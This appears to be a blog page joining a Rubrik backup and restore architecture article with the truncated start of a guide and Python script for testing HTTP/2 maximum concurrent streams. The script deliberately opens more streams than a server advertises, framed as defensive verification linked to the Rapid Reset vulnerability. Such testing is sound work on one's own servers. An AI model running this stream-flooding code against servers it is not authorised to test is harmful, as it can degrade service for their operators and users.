Live Mount is Rubrik’s signature capability—mounting backups as live, queryable databases without copying data back to production storage. The database runs with its data files served directly from the Rubrik cluster over NFS (for Oracle) or SMB 3.0 (for SQL Server).

This capability is transformative for specific use cases. It is not a replacement for production storage.

What Live Mount Delivers:

  • Near instant database availability (seconds to minutes, regardless of database size)
  • Zero storage provisioning on the target host
  • Multiple concurrent mounts from the same backup
  • Point in time access across the entire retention window
  • Ideal for granular recovery, DBCC health checks, test/dev cloning, audit queries, and upgrade validation

What Live Mount Does Not Deliver:

  • Production grade I/O performance
  • High availability during Rubrik cluster maintenance
  • Persistence across host or cluster reboots

IOPS Constraints:

Live Mount performance is bounded by the Rubrik appliance’s ability to serve I/O, not by the target host’s storage subsystem. Published figures suggest approximately 30,000 IOPS per Rubrik appliance for Live Mount workloads. This is adequate for reporting queries, data extraction, and validation testing. It is not adequate for transaction heavy production workloads.

The performance characteristics are inherently different from production storage:

MetricProduction SAN/FlashRubrik Live Mount
Random read IOPS100,000+~30,000 per appliance
Latency profileSub millisecondNetwork + NFS overhead
Write optimisationProduction tunedBackup optimised
Concurrent workloadsDesigned for contentionShared with backup operations

SQL Server Live Mount Specifics:

  • Databases mount via SMB 3.0 shares with UNC paths
  • Transaction log replay occurs during mount for point in time positioning
  • The mounted database is read write, but writes go to the Rubrik cluster
  • Supported for standalone instances, Failover Cluster Instances, and Always On Availability Groups
  • Table level recovery requires mounting the database, then using T SQL to extract and import specific objects

Oracle Live Mount Specifics:

  • Data files mount via NFS; redo logs and control files remain on the target host
  • Automated recovery requires source and target configurations to match (RAC to RAC, single instance to single instance, ASM to ASM)
  • Files only recovery allows dissimilar configurations but requires DBA managed RMAN recovery
  • SPFILE is required for automated recovery; PFILE databases require manual intervention
  • Block change tracking (BCT) is disabled on Live Mount targets
  • Live Mount fails if the target host, RAC cluster, or Rubrik cluster reboots during the mount—requiring forced unmount to clean up metadata
  • Direct NFS (DNFS) is recommended on Oracle RAC nodes for improved recovery performance

What Live Mount Is Not:

Live Mount is explicitly designed for temporary access, not sustained production workloads. The use cases Rubrik markets—test/dev, DBCC validation, granular recovery, audit queries—all share a common characteristic: they are time bounded operations that tolerate moderate I/O performance in exchange for instant availability.

Running production transaction processing against a Live Mount database would be technically possible and operationally inadvisable. The I/O profile, the network dependency, and the lack of high availability guarantees make it unsuitable for workloads where performance and uptime matter.

5.5 The Recovery Hierarchy

Understanding when to use each recovery method matters:

Recovery NeedRecommended MethodTime to AccessStorage Required
Extract specific rows/tablesLive Mount + queryMinutesNone
Validate backup integrityLive Mount + DBCCMinutesNone
Clone for test/devLive MountMinutesNone
Full database replacementExport/RestoreHours (size dependent)Full database size
Disaster recovery cutoverInstant RecoveryMinutes (then migrate)Temporary, then full

The strategic value of Live Mount is avoiding full restores when full restores are unnecessary. For a 5TB database where someone dropped a single table, Live Mount means extracting that table in minutes rather than waiting hours for a complete restore.

For actual disaster recovery, where the production database is gone and must be replaced, Live Mount provides bridge access while the full restore completes in parallel. The database is queryable immediately; production grade performance follows once data migration finishes.

6. Why Logical Streaming Is a Design Failure

Traditional restore models stream backup data through the database host. This guarantees CPU contention, IO pressure, and restore times proportional to database size rather than change size.

Figure 1 illustrates this contrast clearly. Traditional restore requires data to be copied back through the database server, creating high I/O, CPU and network load with correspondingly long restore times. Rubrik’s Live Mount approach mounts the backup copy directly, achieving near zero RTO with minimal data movement. The difference between these approaches becomes decisive when production is down and every minute of restore time translates to business impact.

Rubrik avoids this by mounting database images and extracting only required objects. The database host stops being collateral damage during recovery.

6.1 The VSS Tax: Why SQL Server Backups Cannot Escape Application Coordination

For VMware workloads without databases, Rubrik can leverage storage level snapshots that are instantaneous, application agnostic, and impose zero load on the guest operating system. The hypervisor freezes the VM state, the storage array captures the point in time image, and the backup completes before the application notices.

SQL Server cannot offer this simplicity. The reason is not a Microsoft limitation or a Rubrik constraint. The reason is transactional consistency.

6.1.1 The Crash Consistent Option Exists

Nothing technically prevents Rubrik, or any backup tool, from taking a pure storage snapshot of a SQL Server volume without application coordination. The snapshot would complete in milliseconds with zero database load.

The problem is what you would recover: a crash consistent image, not an application consistent one.

A crash consistent snapshot captures storage state mid flight. This includes partially written pages, uncommitted transactions, dirty buffers not yet flushed to disk, and potentially torn writes caught mid I/O. SQL Server is designed to recover from exactly this state. Every time the database engine starts after an unexpected shutdown, it runs crash recovery, rolling forward committed transactions from the log and rolling back uncommitted ones.

The database will become consistent. Eventually. Probably.

6.1.2 Why Probably Is Not Good Enough

Crash recovery works. It works reliably. It is tested millions of times daily across every SQL Server instance that experiences an unclean shutdown.

But restore confidence matters. When production is down and executives are asking questions, the difference between “this backup is guaranteed consistent” and “this backup should recover correctly after crash recovery completes” is operationally significant.

VSS exists to eliminate that uncertainty.

6.1.3 What VSS Actually Does

When a backup application requests an application consistent SQL Server snapshot, the sequence shown in Figure 2 executes. The backup server sends a signal through VSS Orchestration, which triggers the SQL Server VSS Writer to prepare the database. This preparation involves flushing dirty pages to storage, hardening transaction logs, and momentarily freezing I/O. Only then does the storage-level snapshot execute, capturing a point-in-time consistent image that requires no crash recovery on restore.

The result is a snapshot that requires no crash recovery on restore. The database is immediately consistent, immediately usable, and carries no uncertainty about transactional integrity.

6.1.4 The Coordination Cost

The VSS freeze window is typically brief, milliseconds to low seconds. But the preparation is not free.

Buffer pool flushes on large databases generate I/O pressure. Checkpoint operations compete with production workloads. The freeze, however short, introduces latency for in flight transactions. The database instance is actively participating in its own backup.

For databases measured in terabytes, with buffer pools consuming hundreds of gigabytes, this coordination overhead becomes operationally visible. Backup windows that appear instantaneous from the storage console are hiding real work inside the SQL Server instance.

6.1.5 The Architectural Asymmetry

This creates a fundamental difference in backup elegance across workload types:

Workload TypeBackup MethodApplication LoadRestore State
VMware VM (no database)Storage snapshotZeroCrash consistent (acceptable)
VMware VM (with SQL Server)VSS coordinated snapshotModerateApplication consistent
Physical SQL ServerVSS coordinated snapshotModerate to highApplication consistent
Physical SQL ServerPure storage snapshotZeroCrash consistent (risky)

For a web server or file share, crash consistent is fine. The application has no transactional state worth protecting. For a database, crash consistent means trusting recovery logic rather than guaranteeing consistency.

6.1.6 The Uncomfortable Reality

The largest, most critical SQL Server databases, the ones that would benefit most from zero overhead instantaneous backup, are precisely the workloads where crash consistent snapshots carry the most risk. More transactions in flight. Larger buffer pools. More recovery time if something needs replay.

Rubrik supports VSS coordination because the alternative is shipping backups that might need crash recovery. That uncertainty is acceptable for test environments. It is rarely acceptable for production databases backing financial systems, customer records, or regulatory reporting.

The VSS tax is not a limitation imposed by Microsoft or avoided by competitors. It is the cost of consistency. Every backup platform that claims application consistent SQL Server protection is paying it. The only question is whether they admit the overhead exists.

7. Snapshot Based Protection Is Objectively Better (When You Can Get It)

The previous section explained why SQL Server backups cannot escape application coordination. VSS exists because transactional consistency requires it, and the coordination overhead is the price of certainty.

This makes the contrast with pure snapshot based protection even starker. Where snapshots work cleanly, they are not incrementally better. They are categorically superior.

7.1 What Pure Snapshots Deliver

Snapshot based backups in environments that support them provide:

  • Near instant capture: microseconds to milliseconds, regardless of dataset size
  • Zero application load: the workload never knows a backup occurred
  • Consistent recovery points: the storage layer guarantees point in time consistency
  • Predictable backup windows: duration is independent of data volume
  • No bandwidth consumption during capture: data movement happens later, asynchronously

A 50TB VMware datastore snapshots in the same time as a 50GB datastore. Backup windows become scheduling decisions rather than capacity constraints.

Rubrik exploits this deeply in VMware environments. Snapshot orchestration, instant VM recovery, and live mounts all depend on the hypervisor providing clean, consistent, zero overhead capture points.

7.2 Why This Is Harder Than It Looks

The elegance of snapshot based protection depends entirely on the underlying platform providing the right primitives. This is where the gap between VMware and everything else becomes painful.

VMware offers:

  • Native snapshot APIs with transactional semantics
  • Changed Block Tracking (CBT) for efficient incrementals
  • Hypervisor level consistency without guest coordination
  • Storage integration through VADP (vSphere APIs for Data Protection)

These are not accidental features. VMware invested years building a backup ecosystem because they understood that enterprise adoption required operational maturity, not just compute virtualisation.

Physical hosts offer none of this.

There is no universal snapshot API for bare metal servers. Storage arrays provide snapshot capabilities, but each vendor implements them differently, with different consistency guarantees, different integration points, and different failure modes. The operating system has no standard mechanism to coordinate application state with storage level capture.

7.3 The Physical Host Penalty

This is why physical SQL Server hosts face a compounding disadvantage:

  1. No hypervisor abstraction: there is no layer between the OS and storage that can freeze state cleanly
  2. VSS remains mandatory: application consistency still requires database coordination
  3. No standardised incremental tracking: without CBT or equivalent, every backup must rediscover what changed
  4. Storage integration is bespoke: each array, each SAN, each configuration requires specific handling

The result is that physical hosts with the largest databases—the workloads generating the most backup data, with the longest restore times, under the most operational pressure, receive the least architectural benefit from modern backup platforms.

They are stuck paying the VSS tax without receiving the snapshot dividend.

7.4 The Integration Hierarchy

Backup elegance follows a clear hierarchy based on platform integration depth:

EnvironmentSnapshot QualityIncremental EfficiencyApplication ConsistencyOverall Experience
VMware (no database)ExcellentCBT drivenNot requiredSeamless
VMware (with SQL Server)ExcellentCBT drivenVSS coordinatedGood with overhead
Cloud native (EBS, managed disks)GoodProvider dependentVaries by workloadGenerally clean
Physical with enterprise SANPossibleArray dependentVSS coordinatedComplex but workable
Physical with commodity storageLimitedOften full scanVSS coordinatedPainful

The further down this hierarchy, the more the backup platform must compensate for missing primitives. Rubrik handles this better than most, but even excellent software cannot conjure APIs that do not exist.

7.5 Why the Industry Irony Persists

The uncomfortable truth is that snapshot based protection delivers its greatest value precisely where it is least available.

A 500GB VMware VM snapshots effortlessly. The hypervisor provides everything needed. Backup is boring, as it should be.

A 50TB physical SQL Server, the database actually keeping the business running, containing years of transactional history, backing regulatory reporting and financial reconciliation, must coordinate through VSS, flush terabytes of buffer pool, sustain I/O pressure during capture, and hope the storage layer cooperates.

The workloads that need snapshot elegance the most are architecturally prevented from receiving it.

This is not a Rubrik limitation. It is not a Microsoft conspiracy. It is the accumulated consequence of decades of infrastructure evolution where virtualisation received backup investment and physical infrastructure did not.

7.6 What This Means for Architecture Decisions

Understanding this hierarchy should influence infrastructure strategy:

Virtualise where possible. The backup benefits alone often justify the overhead. A SQL Server VM with VSS coordination still benefits from CBT, instant recovery, and hypervisor level orchestration.

Choose storage with snapshot maturity. If physical hosts are unavoidable, enterprise arrays with proven snapshot integration reduce the backup penalty. This is not the place for commodity storage experimentation.

Accept the VSS overhead. For SQL Server workloads, crash consistent snapshots are technically possible but operationally risky. The coordination cost is worth paying. Budget for it in backup windows and I/O capacity.

Plan restore, not backup. Snapshot speed is irrelevant if restore requires hours of data rehydration. The architectural advantage of snapshots extends to recovery only if the platform supports instant mount and selective restore.

Rubrik’s value in this landscape is not eliminating the integration gaps, nobody can, but navigating them intelligently. Where snapshots work, Rubrik exploits them fully. Where they do not, Rubrik minimises the penalty through parallel restore, live mounts, and metadata driven recovery.

The goal remains the same: make restore the product, regardless of how constrained the backup capture had to be.

8. Rubrik Restore Policies: Strategy, Trade offs, and Gotchas

SLA Domains are Rubrik’s policy abstraction layer, and understanding how to configure them properly separates smooth recoveries from painful ones. The flexibility is substantial, but so are the consequences of misconfiguration.

8.1 Understanding SLA Domain Architecture

Rubrik’s policy model centres on SLA Domains, named policies that define retention, frequency, replication, and archival behaviour. Objects are assigned to SLA Domains rather than configured individually, which creates operational leverage but requires upfront design discipline.

The core parameters that matter for restore planning:

Snapshot Frequency determines your Recovery Point Objective (RPO). A 4-hour frequency means you could lose up to 4 hours of data. For SQL Server with log backup enabled, transaction logs between snapshots reduce effective RPO to minutes, but the full snapshot frequency still determines how quickly you can access a baseline restore point.

Local Retention controls how many snapshots remain on the Rubrik cluster for instant access. This is your Live Mount window. Data within local retention restores in minutes. Data beyond it requires rehydration from archive, which takes hours.

Replication copies snapshots to a secondary Rubrik cluster, typically in another location. This is your disaster recovery tier. Replication targets can serve Live Mount operations, meaning DR isn’t just “eventually consistent backup copies” but actual instant recovery capability at the secondary site.

Archival moves aged snapshots to object storage (S3, Azure Blob, Google Cloud Storage). Archive tier data cannot be Live Mounted, it must be retrieved first, which introduces retrieval latency and potentially egress costs.

8.2 The Retention vs. Recovery Speed Trade off

This is where most organisations get the policy design wrong.

The temptation is to keep minimal local retention and archive aggressively to reduce storage costs. The consequence is that any restore request older than a few days becomes a multi hour operation.

Consider the mathematics for a 5TB SQL Server database:

Recovery ScenarioLocal RetentionTime to AccessOperational Impact
Yesterday’s backupWithin local retention2-5 minutes (Live Mount)Minimal
Last week’s backupWithin local retention2-5 minutes (Live Mount)Minimal
Last month’s backupArchived4-8 hours (retrieval + restore)Significant
Last quarter’s backupArchived (cold tier)12-24 hoursMajor incident

The storage cost of keeping 30 days local versus 7 days local might seem significant when multiplied across the estate. But the operational cost of a 6 hour restore delay during an audit request or compliance investigation often exceeds years of incremental storage spend.

Recommendation: Size local retention to cover your realistic recovery scenarios, not your theoretical minimum. For most organisations, 14-30 days of local retention provides the right balance between cost and operational flexibility.

8.3 SLA Domain Design Patterns

8.3.1 Pattern 1: Tiered by Criticality

Create separate SLA Domains for different criticality levels:

  • Platinum: 4 hour snapshots, 30 day local retention, synchronous replication, 7 year archive
  • Gold: 8 hour snapshots, 14 day local retention, asynchronous replication, 3 year archive
  • Silver: Daily snapshots, 7 day local retention, no replication, 1 year archive
  • Bronze: Daily snapshots, 7 day local retention, no replication, 90 day archive

This pattern works well when criticality maps cleanly to workload types, but creates governance overhead when applications span tiers.

8.3.2 Pattern 2: Tiered by Recovery Requirements

Align SLA Domains to recovery time objectives rather than business criticality:

  • Instant Recovery: Maximum local retention, synchronous replication, Live Mount always available
  • Same Day Recovery: 14 day local retention, asynchronous replication
  • Next Day Recovery: 7 day local retention, archive first strategy

This pattern acknowledges that “critical” and “needs instant recovery” aren’t always the same thing. A compliance archive might be business critical but tolerate 24 hour recovery times.

8.3.3 Pattern 3: Application Aligned

Create SLA Domains per major application or database platform:

  • SQL Server Production
  • SQL Server Non Production
  • Oracle Production
  • VMware Infrastructure
  • File Shares

This pattern simplifies troubleshooting and reporting but can lead to policy sprawl as the estate grows.

8.4 Log Backup Policies: The Hidden Complexity

For SQL Server and Oracle, snapshot frequency alone doesn’t tell the full story. Transaction log backups between snapshots determine actual RPO.

Rubrik supports log backup frequencies down to 1 minute for SQL Server. The trade offs:

Aggressive Log Backup (1-5 minute frequency):

  • Sub 5 minute RPO
  • Higher metadata overhead on Rubrik cluster
  • More objects to manage during restore
  • Longer Live Mount preparation time (more logs to replay)

Conservative Log Backup (15-60 minute frequency):

  • Acceptable RPO for most workloads
  • Lower operational overhead
  • Faster Live Mount operations
  • Simpler troubleshooting

Gotcha: Log backup frequency creates a hidden I/O load on the source database. A 1 minute log backup interval on a high transaction database generates constant log backup traffic. For already I/O constrained databases, this can become the straw that breaks performance.

Recommendation: Match log backup frequency to actual RPO requirements, not aspirational ones. If the business can tolerate 15 minutes of data loss, don’t configure 1 minute log backups just because you can.

8.5 Replication Topology Gotchas

Replication seems straightforward, copy snapshots to another cluster, but the implementation details matter.

8.5.1 Gotcha 1: Replication Lag Under Load

Asynchronous replication means the target cluster is always behind the source. During high backup activity (month end processing, batch loads), this lag can extend to hours. If a disaster occurs during this window, you lose more data than your SLA suggests.

Monitor replication lag as an operational metric, not just a capacity planning number.

8.5.2 Gotcha 2: Bandwidth Contention with Production Traffic

Replication competes for the same network paths as production traffic. If your backup replication saturates a WAN link, production application performance degrades.

Either implement QoS policies to protect production traffic, or schedule replication during low utilisation windows. Rubrik supports replication scheduling, but the default is “as fast as possible,” which isn’t always appropriate.

8.5.3 Gotcha 3: Cascaded Replication Complexity

For multi site architectures, you might configure Site A → Site B → Site C replication. Each hop adds latency and failure modes. A Site B outage breaks the chain to Site C.

Consider whether hub and spoke (Site A replicates independently to both B and C) better matches your DR requirements, despite the additional bandwidth consumption.

8.6 Archive Tier Selection: Retrieval Time Matters

Object storage isn’t monolithic. The choice between storage classes has direct recovery implications.

Storage ClassTypical Retrieval TimeUse Case
S3 Standard / Azure HotImmediateFrequently accessed archives
S3 Standard-IA / Azure CoolImmediate (higher retrieval cost)Infrequent but urgent access
S3 Glacier Instant RetrievalMillisecondsCompliance archives with occasional audit access
S3 Glacier Flexible Retrieval1-12 hoursLong-term retention with rare access
S3 Glacier Deep Archive12-48 hoursLegal hold, never access unless subpoenaed

Gotcha: Rubrik’s archive policy assigns snapshots to a single storage class. If your retention spans 7 years, all 7 years of archives pay the same storage rate, even though year 1 archives are accessed far more frequently than year 7 archives.

Recommendation: Consider tiered archive policies—recent archives to Standard-IA, aged archives to Glacier. This requires multiple SLA Domains and careful lifecycle management, but the cost savings compound significantly at scale.

8.7 Policy Assignment Gotchas

8.7.1 Gotcha 1: Inheritance and Override Conflicts

Rubrik supports hierarchical policy assignment (cluster → host → database). When policies conflict, the resolution logic isn’t always intuitive. A database with an explicit SLA assignment won’t inherit changes made to its parent host’s policy.

Document your policy hierarchy explicitly. During audits, the question “what policy actually applies to this database?” should have an immediate, verifiable answer.

8.7.2 Gotcha 2: Pre script and Post script Failures

Custom scripts for application quiescing or notification can fail, and failure handling varies. A pre script failure might skip the backup entirely (safe but creates a gap) or proceed without proper quiescing (dangerous).

Test script failure modes explicitly. Know what happens when your notification webhook is unreachable or your custom quiesce script times out.

8.7.3 Gotcha 3: Time Zone Confusion

Rubrik displays times in the cluster’s configured time zone, but SLA schedules operate in UTC unless explicitly configured otherwise. An “8 PM backup” might run at midnight local time if the time zone mapping is wrong.

Verify backup execution times after policy configuration, don’t trust the schedule display alone.

8.8 Testing Your Restore Policies

Policy design is theoretical until tested. The following tests should be regular operational practice:

Live Mount Validation: Mount a backup from local retention and verify application functionality. This proves both backup integrity and Live Mount operational capability.

Archive Retrieval Test: Retrieve a backup from archive tier and time the operation. Compare actual retrieval time against SLA commitments.

Replication Failover Test: Perform a Live Mount from the replication target, not the source cluster. This validates that DR actually works, not just that replication is running.

Point in Time Recovery Test: For databases with log backup enabled, recover to a specific timestamp between snapshots. This validates that log chain integrity is maintained.

Concurrent Restore Test: Simulate a ransomware scenario by triggering multiple simultaneous restores. Measure whether your infrastructure can sustain the required parallelism.

8.9 Policy Review Triggers

SLA Domains shouldn’t be “set and forget.” Trigger policy reviews when:

  • Application criticality changes (promotion to production, decommissioning)
  • Recovery requirements change (new compliance mandates, audit findings)
  • Infrastructure changes (new replication targets, storage tier availability)
  • Performance issues emerge (backup windows exceeded, replication lag growing)
  • Cost optimisation cycles (storage spend review, cloud egress analysis)

The goal is proactive policy maintenance, not reactive incident response when a restore takes longer than expected.

9. Ransomware: Where Architecture Is Exposed

9.1 The Restore Storm Problem

After ransomware, the challenge is not backup availability. The challenge is restoring everything at once.

Constraints appear immediately. East-west traffic saturates. DWDM links run hot. Core switch buffers overflow. Cloud egress throttling kicks in.

Rubrik mitigates this through parallel restores, SLA based prioritisation, and live mounts for critical systems. What it cannot do is defeat physics. A good recovery plan avoids turning a data breach into a network outage.

10. SaaS vs Appliance: This Is a Network Decision

Functionally, Rubrik SaaS and on prem appliances share the same policy engine, metadata index, and restore semantics.

The difference is bandwidth reality.

On prem appliances provide fast local restores, predictable latency, and minimal WAN dependency. SaaS based protection provides excellent cloud workload coverage and operational simplicity, but restore speed is bounded by network capacity and egress costs.

Hybrid estates usually require both.

11. Why Rubrik in the Cloud?

Cloud providers offer native backup primitives. These are necessary but insufficient. They do not provide unified policy across environments, cross account recovery at scale, ransomware intelligence, or consistent restore semantics. Rubrik turns cloud backups into recoverable systems rather than isolated snapshots.

11.1 Should You Protect Your AWS Root and Crypto Accounts?

Yes, because losing the control plane is worse than losing data.

Rubrik protects IAM configuration, account state, and infrastructure metadata. After a compromise, restoring how the account was configured is as important as restoring the data itself.

12. Backup Meets Security (Finally)

Rubrik integrates threat awareness into recovery using entropy analysis, change rate anomaly detection, and snapshot divergence tracking.cThis answers the most dangerous question in recovery: which backup is actually safe to restore? Most platforms cannot answer this with confidence.

13. VMware First Class Citizen, Physical Hosts Still Lag

Rubrik’s deepest integrations exist in VMware environments, including snapshot orchestration, instant VM recovery, and live mounts.

The uncomfortable reality remains that physical hosts with the largest datasets would benefit most from snapshot based protection, yet receive the least integration. This is an industry gap, not just a tooling one.

14. When Rubrik Is Not the Right Tool

Rubrik is not universal.

It is less optimal when bandwidth is severely constrained, estates are very small, or tape workflows are legally mandated.

Rubrik’s value emerges at scale, under pressure, and during failure.

15. Conclusion: Boredom Is Success

Backups should be boring. Restores should be quiet. Executives should never know the platform exists.

The only time backups become exciting is when they fail, and that excitement is almost always lethal.

Rubrik is not interesting because it stores data. It is interesting because, when everything is already on fire, restore remains a controlled engineering exercise rather than a panic response.

References

  1. Gartner Magic Quadrant for Enterprise Backup and Recovery Solutions – https://www.gartner.com/en/documents/5138291
  2. Rubrik Technical Architecture Whitepapers – https://www.rubrik.com/resources
  3. Microsoft SQL Server Backup and Restore Internals – https://learn.microsoft.com/en-us/sql/relational-databases/backup-restore/backup-overview-sql-server
  4. VMware Snapshot and Backup Best Practices – https://knowledge.broadcom.com/external/article?legacyId=1025279
  5. AWS Backup and Recovery Documentation – https://docs.aws.amazon.com/aws-backup/
  6. NIST SP 800-209 Security Guidelines for Storage Infrastructure – https://csrc.nist.gov/publications/detail/sp/800-209/final
  7. Rubrik SQL Live Mount Documentation – https://www.rubrik.com/solutions/sql-live-mount
  8. Rubrik Oracle Live Mount Documentation – https://docs.rubrik.com/en-us/saas/oracle/oracle_live_mount.html
  9. Rubrik for Oracle and Microsoft SQL Server Data Sheet – https://www.rubrik.com/content/dam/rubrik/en/resources/data-sheet/Rubrik-for-Oracle-and-Microsoft-SQL-Sever-DS.pdf
  10. Rubrik Enhanced Performance for Microsoft SQL and Oracle Database – https://www.rubrik.com/blog/technology/2021/12/rubrik-enhanced-performance-for-microsoft-sql-and-oracle-database
  11. Rubrik PostgreSQL Support Announcement – https://www.rubrik.com/blog/technology/24/10/rubrik-expands-database-protection-with-postgre-sql-support-and-on-premises-sensitive-data-monitoring-for-microsoft-sql-server
  12. Rubrik Elastic App Service – https://www.rubrik.com/solutions/elastic-app-service
  13. Rubrik and VMware vSphere Reference Architecture – https://www.rubrik.com/content/dam/rubrik/en/resources/white-paper/ra-rubrik-vmware-vsphere.pdf
  14. Protecting Microsoft SQL Server with Rubrik Technical White Paper – https://www.rubrik.com/content/dam/rubrik/en/resources/white-paper/rwp-protecting-microsoft-sql-server-with-rubrik.pdf
  15. The Definitive Guide to Rubrik Cloud Data Management – https://www.rubrik.com/content/dam/rubrik/en/resources/white-paper/rwp-definitive-guide-to-rubrik-cdm.pdf
  16. Rubrik Oracle Tools GitHub Repository – https://github.com/rubrikinc/rubrik_oracle_tools
  17. Automating SQL Server Live Mounts with Rubrik – https://virtuallysober.com/2017/08/08/automating-sql-server-live-mounts-with-rubrik-alta-4-0/
0
0

Testing Maximum HTTP/2 Concurrent Streams for Your Website

1. Introduction

Understanding and testing your server’s maximum concurrent stream configuration is critical for both performance tuning and security hardening against HTTP/2 attacks. This guide provides comprehensive tools and techniques to test the SETTINGS_MAX_CONCURRENT_STREAMS parameter on your web servers.

This article complements our previous guide on Testing Your Website for HTTP/2 Rapid Reset Vulnerabilities from a macOS. While that article focuses on the CVE-2023-44487 Rapid Reset attack, this guide helps you verify that your server properly enforces stream limits, which is a critical defense mechanism.

2. Why Test Stream Limits?

The SETTINGS_MAX_CONCURRENT_STREAMS setting determines how many concurrent requests a client can multiplex over a single HTTP/2 connection. Testing this limit is important because:

  1. Security validation: Confirms your server enforces reasonable stream limits
  2. Configuration verification: Ensures your settings match security recommendations (typically 100-128 streams)
  3. Performance tuning: Helps optimize the balance between throughput and resource consumption
  4. Attack surface assessment: Identifies if servers accept dangerously high stream counts

3. Understanding HTTP/2 Stream Limits

When an HTTP/2 connection is established, the server sends a SETTINGS frame that includes:

SETTINGS_MAX_CONCURRENT_STREAMS: 100

This tells the client the maximum number of concurrent streams allowed. A compliant client should respect this limit, but attackers will not.

3.1. Common Default Values

Web Servers:

  • Nginx: 128 (configurable via http2_max_concurrent_streams)
  • Apache: 100 (configurable via H2MaxSessionStreams)
  • Caddy: 250 (configurable via max_concurrent_streams)
  • LiteSpeed: 100 (configurable in admin panel)

Reverse Proxies and Load Balancers:

  • HAProxy: No default limit (should be explicitly configured)
  • Envoy: 100 (configurable via max_concurrent_streams)
  • Traefik: 250 (configurable via maxConcurrentStreams)

CDN and Cloud Services:

  • CloudFlare: 128 (managed automatically)
  • AWS ALB: 128 (managed automatically)
  • Azure Front Door: 100 (managed automatically)

4. The Stream Limit Testing Script

The following Python script tests your server’s maximum concurrent streams using the h2 library. This script will:

  • Connect to your HTTP/2 server
  • Read the advertised SETTINGS_MAX_CONCURRENT_STREAMS value
  • Attempt to open more streams than the advertised limit
  • Verify that the server actually enforces the limit
  • Provide detailed results and recommendations

4.1. Prerequisites

Install the required Python libraries:

pip3 install h2 hyper --break-system-packages

Verify installation:

python3 -c "import h2; print(f'h2 version: {h2.__version__}')"

4.2. Complete Script

Save the following as http2_stream_limit_tester.py:

#!/usr/bin/env python3
"""
HTTP/2 Maximum Concurrent Streams Tester

Tests the SETTINGS_MAX_CONCURRENT_STREAMS limit on HTTP/2 servers
and attempts to exceed it to verify enforcement.

Usage:
    python3 http2_stream_limit_tester.py --host example.com --port 443

Requirements:
    pip3 install h2 hyper --break-system-packages
"""

import argparse
import socket
import ssl
import time
from typing import Dict, List, Optional, Tuple
from dataclasses import dataclass, field

try:
    from h2.connection import H2Connection
    from h2.config import H2Configuration
    from h2.events import (
        RemoteSettingsChanged,
        StreamEnded,
        DataReceived,
        StreamReset,
        WindowUpdated,
        SettingsAcknowledged,
        ResponseReceived
    )
    from h2.exceptions import ProtocolError
except ImportError:
    print("Error: h2 library not installed")
    print("Install with: pip3 install h2 hyper --break-system-packages")
    exit(1)


@dataclass
class StreamLimitTestResults:
    """Results from stream limit testing"""
    advertised_max_streams: Optional[int] = None
    actual_max_streams: int = 0
    successful_streams: int = 0
    failed_streams: int = 0
    reset_streams: int = 0
    enforcement_detected: bool = False
    test_duration: float = 0.0
    server_settings: Dict = field(default_factory=dict)
    errors: List[str] = field(default_factory=list)


class HTTP2StreamLimitTester:
    """Test HTTP/2 server stream limits"""

    def __init__(
        self,
        host: str,
        port: int = 443,
        path: str = "/",
        use_tls: bool = True,
        timeout: int = 30,
        verbose: bool = False
    ):
        self.host = host
        self.port = port
        self.path = path
        self.use_tls = use_tls
        self.timeout = timeout
        self.verbose = verbose

        self.socket: Optional[socket.socket] = None
        self.h2_conn: Optional[H2Connection] = None
        self.server_max_streams: Optional[int] = None
        self.active_streams: Dict[int, dict] = {}

    def connect(self) -> bool:
        """Establish connection to the server"""
        try:
            # Create socket
            self.socket = socket.create_connection(
                (self.host, self.port),
                timeout=self.timeout
            )

            # Wrap with TLS if needed
            if self.use_tls:
                context = ssl.create_default_context()
                context.check_hostname = True
                context.verify_mode = ssl.CERT_REQUIRED

                # Set ALPN protocols for HTTP/2
                context.set_alpn_protocols(['h2', 'http/1.1'])

                self.socket = context.wrap_socket(
                    self.socket,
                    server_hostname=self.host
                )

                # Verify HTTP/2 was negotiated
                negotiated_protocol = self.socket.selected_alpn_protocol()
                if negotiated_protocol != 'h2':
                    raise Exception(f"HTTP/2 not negotiated. Got: {negotiated_protocol}")

                if self.verbose:
                    print(f"TLS connection established (ALPN: {negotiated_protocol})")

            # Initialize HTTP/2 connection
            config = H2Configuration(client_side=True)
            self.h2_conn = H2Connection(config=config)
            self.h2_conn.initiate_connection()

            # Send connection preface
            self.socket.sendall(self.h2_conn.data_to_send())

            # Receive server settings
            self._receive_data()

            if self.verbose:
                print(f"HTTP/2 connection established to {self.host}:{self.port}")

            return True

        except Exception as e:
            if self.verbose:
                print(f"Connection failed: {e}")
            return False

    def _receive_data(self, timeout: Optional[float] = None) -> List:
        """Receive and process data from server"""
        if timeout:
            self.socket.settimeout(timeout)
        else:
            self.socket.settimeout(self.timeout)

        events = []
        try:
            data = self.socket.recv(65536)
            if not data:
                return events

            events_received = self.h2_conn.receive_data(data)

            for event in events_received:
                events.append(event)

                if isinstance(event, RemoteSettingsChanged):
                    self._handle_settings(event)
                elif isinstance(event, ResponseReceived):
                    if self.verbose:
                        print(f"  Stream {event.stream_id}: Response received")
                elif isinstance(event, DataReceived):
                    if self.verbose:
                        print(f"  Stream {event.stream_id}: Data received ({len(event.data)} bytes)")
                elif isinstance(event, StreamEnded):
                    if self.verbose:
                        print(f"  Stream {event.stream_id}: Ended normally")
                    if event.stream_id in self.active_streams:
                        self.active_streams[event.stream_id]['ended'] = True
                elif isinstance(event, StreamReset):
                    if self.verbose:
                        print(f"  Stream {event.stream_id}: Reset (error code: {event.error_code})")
                    if event.stream_id in self.active_streams:
                        self.active_streams[event.stream_id]['reset'] = True

            # Send any pending data
            data_to_send = self.h2_conn.data_to_send()
            if data_to_send:
                self.socket.sendall(data_to_send)

        except socket.timeout:
            pass
        except Exception as e:
            if self.verbose:
                print(f"Error receiving data: {e}")

        return events

    def _handle_settings(self, event: RemoteSettingsChanged):
        """Handle server settings"""
        for setting, value in event.changed_settings.items():
            setting_name = setting.name if hasattr(setting, 'name') else str(setting)

            if self.verbose:
                print(f"  Server setting: {setting_name} = {value}")

            # Check for MAX_CONCURRENT_STREAMS
            if 'MAX_CONCURRENT_STREAMS' in setting_name:
                self.server_max_streams = value
                if self.verbose:
                    print(f"Server advertises max concurrent streams: {value}")

    def send_stream_request(self, stream_id: int) -> bool:
        """Send a GET request on a specific stream"""
        try:
            headers = [
                (':method', 'GET'),
                (':path', self.path),
                (':scheme', 'https' if self.use_tls else 'http'),
                (':authority', self.host),
                ('user-agent', 'HTTP2-Stream-Limit-Tester/1.0'),
            ]

            self.h2_conn.send_headers(stream_id, headers, end_stream=True)
            data_to_send = self.h2_conn.data_to_send()

